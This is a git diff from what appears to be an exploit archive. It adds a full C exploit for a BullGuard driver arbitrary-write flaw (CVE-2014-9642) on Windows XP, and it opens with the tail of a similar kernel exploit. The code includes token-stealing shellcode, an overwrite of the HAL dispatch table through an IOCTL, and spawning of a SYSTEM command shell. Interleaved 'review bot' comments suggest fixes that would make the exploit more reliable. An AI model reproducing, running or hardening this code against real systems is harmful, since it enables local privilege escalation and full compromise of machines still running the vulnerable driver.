{ + printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); + return -1; + } + else + { + printf("[+] Open %s device successful\n", devhandle); + } + + HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); + printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); + + input[0] = addrtoshell; // input buffer contents gets written to our output buffer address + + printf("[+] Input buffer contents %08x\n", input[0]); + + printf("[~] Press any key to send Exploit . . .\n"); + getch(); + + DeviceIoControl(hDevice, 0x830020f8, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); + + printf("[+] Buffer sent\n"); + + printf("[+] Spawning SYSTEM Shell\n"); + NtQueryIntervalProfile(2, &time); + spawnShell(); + + printf("[+] Restoring Hal dispatch table pointers\n\n"); + + DeviceIoControl(hDevice, 0x830020f8, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); + + CloseHandle(hDevice); + + return 0; +} diff --git a/platforms/windows/local/35994.c b/platforms/windows/local/35994.c new file mode 100755 index 000000000..e01044f8b --- /dev/null +++ b/platforms/windows/local/35994.c 
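Review bot: `restore_pointers_xp` hard-codes ten ntoskrnl/hal addresses captured from the author's own XP SP3 kernel, but the only gate before the restoring `DeviceIoControl(hDevice, 0x830020f8, restore_pointers_xp, ...)` call is `GetWindowsVersion() == 1`, which matches any Windows 5.1 build; the header's statement that the pointers are static in XP is not verified against the running kernel, so on a different build the "restore" step itself writes ten wrong pointers into the dispatch table. At minimum the array's comment should record the exact kernel and hal build the bytes were taken from, since the `kd>` dump in the header documents the post-overwrite state rather than where the original values came from. Note also that the array is declared `BYTE restore_pointers_xp[]` but initialised from a string literal, so `sizeof(restore_pointers_xp)-1` depends on the implicit terminating NUL; a `{ ... }` byte list like `token_steal_xp` would make the length explicit.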
@@ -0,0 +1,340 @@
+?/*
+
+Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation
+Date - 04th February 2015
+Discovered by - Parvez Anwar (@parvezghh)
+Vendor Homepage - http://www.bullguard.com/
+Tested Version - 14.1.285.4
+Driver Version - 1.0.0.6 - BdAgent.sys
+Tested on OS - 32bit Windows XP SP3
+OSVDB - http://www.osvdb.org/show/osvdb/114478
+CVE ID - CVE-2014-9642
+Vendor fix url - http://www.bullguard.com/about/release-notes.aspx
+Fixed Version - 15.0.288.1
+Fixed driver ver - 1.0.0.7
+
+
+
+Note
+----
+Overwritten HAL dispatch table after exploit
+
+kd> dps nt!HalDispatchTable l c
+8054ccb8 00000003
+8054ccbc 00340000
+8054ccc0 00010000
+8054ccc4 0a060002
+8054ccc8 ee657645
+8054cccc 00000001
+8054ccd0 00000001
+8054ccd4 867c1bf0
+8054ccd8 80613f7b nt!IoSetPartitionInformation
+8054ccdc 806141ef nt!IoWritePartitionTable
+8054cce0 8052d157 nt!CcHasInactiveViews
+8054cce4 804e42d1 nt!ObpTraceDepth+0x19
+
+7 pointers get overwritten. Since input buffer is in our control and pointers
+are static in XP I've triggered the overwrite again restoring the pointers.
+
+*/
+
+
+#include
+#include
+
+#define BUFSIZE 4096
+
+
+typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
+ PVOID Unknown1;
+ PVOID Unknown2;
+ PVOID Base;
+ ULONG Size;
+ ULONG Flags;
+ USHORT Index;
+ USHORT NameLength;
+ USHORT LoadCount;
+ USHORT PathLength;
+ CHAR ImageName[256];
+} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
+
+typedef struct _SYSTEM_MODULE_INFORMATION {
+ ULONG Count;
+ SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+ SystemModuleInformation = 11,
+ SystemHandleInformation = 16
+} SYSTEM_INFORMATION_CLASS;
+
+typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
+ SYSTEM_INFORMATION_CLASS SystemInformationClass,
+ PVOID SystemInformation,
+ ULONG SystemInformationLength,
+ PULONG ReturnLength);
+
+typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
+ DWORD ProfileSource,
+ PULONG Interval);
+
+typedef void (*FUNCTPTR)();
+
+
+
+// Windows XP SP3
+
+#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
+#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
+#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
+#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
+
+
+BYTE token_steal_xp[] =
+{
+ 0x52, // push edx Save edx on the stack
+ 0x53, // push ebx Save ebx on the stack
+ 0x33,0xc0, // xor eax, eax eax = 0
+ 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
+ 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
+ 0x8b,0xc8, // mov ecx, eax
+ 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
+ 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
+ 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+ 
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
+ 0x75,0xe8, // jne ----
+ 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
+ 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
+ 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
+ 0x5b, // pop ebx Restores ebx
+ 0x5a, // pop edx Restores edx
+ 0xc2,0x08 // ret 8 Away from the kernel
+};
+
+
+
+BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable
+"\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation
+"\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation
+"\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots
+"\x00\x00\x00\x00" // 8054ccc8 00000000
+"\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR
+"\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters
+"\xe5\x4a\x5c\x80"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable
+
+
+
+DWORD HalDispatchTableAddress()
+{
+ _NtQuerySystemInformation NtQuerySystemInformation;
+ PSYSTEM_MODULE_INFORMATION pModuleInfo;
+ DWORD HalDispatchTable;
+ CHAR kFullName[256];
+ PVOID kBase = NULL;
+ LPSTR kName;
+ HMODULE Kernel;
+ FUNCTPTR Hal;
+ ULONG len;
+ NTSTATUS status;
+
+
+ NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
+
+ if (!NtQuerySystemInformation)
+ {
+ printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
+ return -1;
+ }
+
+ status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
+
+ if (!status)
+ {
+ printf("[-] An error occured while reading NtQuerySystemInformation. 
Status = 0x%08x\n\n", status);
+ return -1;
+ }
+
+ pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
+
+ if(pModuleInfo == NULL)
+ {
+ printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
+ return -1;
+ }
+
+ status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
+
+ memset(kFullName, 0x00, sizeof(kFullName));
+ strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
+ kBase = pModuleInfo->Module[0].Base;
+
+ printf("[i] Kernel base name %s\n", kFullName);
+ kName = strrchr(kFullName, '\\');
+
+ Kernel = LoadLibraryA(++kName);
+
+ if(Kernel == NULL)
+ {
+ printf("[-] Failed to load kernel base\n\n");
+ return -1;
+ }
+
+ Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
+
+ if(Hal == NULL)
+ {
+ printf("[-] Failed to find HalDispatchTable\n\n");
+ return -1;
+ }
+
+ printf("[i] HalDispatchTable address 0x%08x\n", Hal);
+ printf("[i] Kernel handle 0x%08x\n", Kernel);
+ printf("[i] Kernel base address 0x%08x\n", kBase);
+
+ HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
+
+ printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
+
+ if(!HalDispatchTable)
+ {
+ printf("[-] Failed to calculate HalDispatchTable\n\n");
+ return -1;
+ }
+
+ return HalDispatchTable;
+}
+
+
+int GetWindowsVersion()
+{
+ int v = 0;
+ DWORD version = 0, minVersion = 0, majVersion = 0;
+
+ version = GetVersion();
+
+ minVersion = (DWORD)(HIBYTE(LOWORD(version)));
+ majVersion = (DWORD)(LOBYTE(LOWORD(version)));
+
+ if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
+ if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
+ if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
+
+ return v;
+}
+
+
+void spawnShell()
+{
+ STARTUPINFOA si;
+ PROCESS_INFORMATION pi;
+
+
+ ZeroMemory(&pi, sizeof(pi));
+ ZeroMemory(&si, sizeof(si));
+ si.cb = sizeof(si);
+
+ si.cb = sizeof(si);
+ si.dwFlags = STARTF_USESHOWWINDOW;
+ 
si.wShowWindow = SW_SHOWNORMAL;
+
+ if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
+ {
+ printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
+ return;
+ }
+
+ CloseHandle(pi.hThread);
+ CloseHandle(pi.hProcess);
+}
+
+
+int main(int argc, char *argv[])
+{
+
+ _NtQueryIntervalProfile NtQueryIntervalProfile;
+ LPVOID input[1] = {0};
+ LPVOID addrtoshell;
+ HANDLE hDevice;
+ DWORD dwRetBytes = 0;
+ DWORD HalDispatchTableTarget;
+ ULONG time = 0;
+ unsigned char devhandle[MAX_PATH];
+
+
+ printf("-------------------------------------------------------------------------------\n");
+ printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n");
+ printf(" Tested on Windows XP SP3 (32bit) \n");
+ printf("-------------------------------------------------------------------------------\n\n");
+
+ if (GetWindowsVersion() == 1)
+ {
+ printf("[i] Running Windows XP\n");
+ }
+
+ if (GetWindowsVersion() == 0)
+ {
+ printf("[i] Exploit not supported on this OS\n\n");
+ return -1;
+ }
+
+ sprintf(devhandle, "\\\\.\\%s", "bdagent");
+
+ NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
+
+ if (!NtQueryIntervalProfile)
+ {
+ printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
+ return -1;
+ }
+
+ addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+ if(addrtoshell == NULL)
+ {
+ printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
+ return -1;
+ }
+ printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
+
+ memset(addrtoshell, 0x90, BUFSIZE);
+ memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
+ printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
+
+ hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+
+ if (hDevice == INVALID_HANDLE_VALUE)
+ {
+ printf("[-] 
CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
+ return -1;
+ }
+ else
+ {
+ printf("[+] Open %s device successful\n", devhandle);
+ }
+
+ HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
+ printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
+
+ input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
+
+ printf("[+] Input buffer contents %08x\n", input[0]);
+
+ printf("[~] Press any key to send Exploit . . .\n");
+ getch();
+
+ DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
+
+ printf("[+] Buffer sent\n");
+
+ printf("[+] Spawning SYSTEM Shell\n");
+ NtQueryIntervalProfile(2, &time);
+ spawnShell();
+
+ printf("[+] Restoring Hal dispatch table pointers\n\n");
+
+ DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
+
+ CloseHandle(hDevice);
+
+ return 0;
+}
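Review bot: `main` never checks the value of `HalDispatchTableAddress()` before adding `sizeof(DWORD)` to it, although that helper returns -1 on each of its failure paths, so a failed lookup silently becomes `HalDispatchTableTarget == 3` and the two DeviceIoControl calls are still issued against that bogus address instead of the program aborting; guard it with `DWORD hal = HalDispatchTableAddress(); if (hal == (DWORD)-1) return -1;` and derive the target from `hal`. Inside the helper, `kName = strrchr(kFullName, '\\')` is passed straight to `LoadLibraryA(++kName)`, which dereferences NULL when the module name carries no backslash, so `if (kName == NULL) return -1;` belongs before the increment. The `if (!status)` after the sizing probe of `NtQuerySystemInformation` also reads inverted — a zero (success) status is reported as an error while the non-zero length-mismatch status that the probe presumably returns passes through, so that branch guards nothing and deserves a comment or a real STATUS check. Finally, the file's first line `?/*` looks like a stray byte (likely a mangled BOM) ahead of the comment opener, which some compilers will reject outright.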